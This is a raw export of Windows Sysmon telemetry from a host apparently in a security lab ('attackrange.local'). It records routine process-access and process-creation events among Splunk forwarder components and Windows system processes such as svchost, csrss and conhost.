21:51:02.475{BFB545BB-B864-6058-0500-00000000AF01}628644C:\Windows\system32\csrss.exe{BFB545BB-B446-605B-345A-00000000AF01}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638743Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.475{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B446-605B-345A-00000000AF01}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638742Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:02.476{BFB545BB-B446-605B-345A-00000000AF01}1132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000638784Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B447-605B-365A-00000000AF01}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638783Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638782Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638781Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638780Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638779Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638778Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638777Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638776Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638775Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638774Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B864-6058-0500-00000000AF01}6281076C:\Windows\system32\csrss.exe{BFB545BB-B447-605B-365A-00000000AF01}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000638773Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B8FB-6058-A200-00000000AF01}36401220C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{BFB545BB-B447-605B-365A-00000000AF01}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000638772Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.819{BFB545BB-B447-605B-365A-00000000AF01}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{BFB545BB-B865-6058-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000638771Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.287{BFB545BB-B447-605B-355A-00000000AF01}800976C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{BFB545BB-B8FB-6058-A200-00000000AF01}3640C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638770Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B8FB-6058-A600-00000000AF01}8083700C:\Windows\system32\conhost.exe{BFB545BB-B447-605B-355A-00000000AF01}800C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638769Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638768Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638767Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638766Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638765Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638764Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638763Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638762Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:51:03.147{BFB545BB-B865-6058-0C00-00000000AF01}9403028C:\Windows\system32\svchost.exe{BFB545BB-B866-6058-1C00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000638761Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 